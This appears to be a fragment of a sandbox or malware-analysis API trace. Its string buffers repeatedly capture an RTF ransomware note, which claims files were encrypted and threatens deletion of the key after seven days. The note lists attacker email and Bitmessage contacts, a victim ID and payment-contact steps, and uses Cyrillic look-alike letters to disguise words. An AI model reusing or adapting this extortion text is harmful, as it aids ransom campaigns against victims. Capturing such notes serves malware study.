s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.076] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0288.076] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24866c8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÏ^êB95-", lpUsedDefaultChar=0x0) 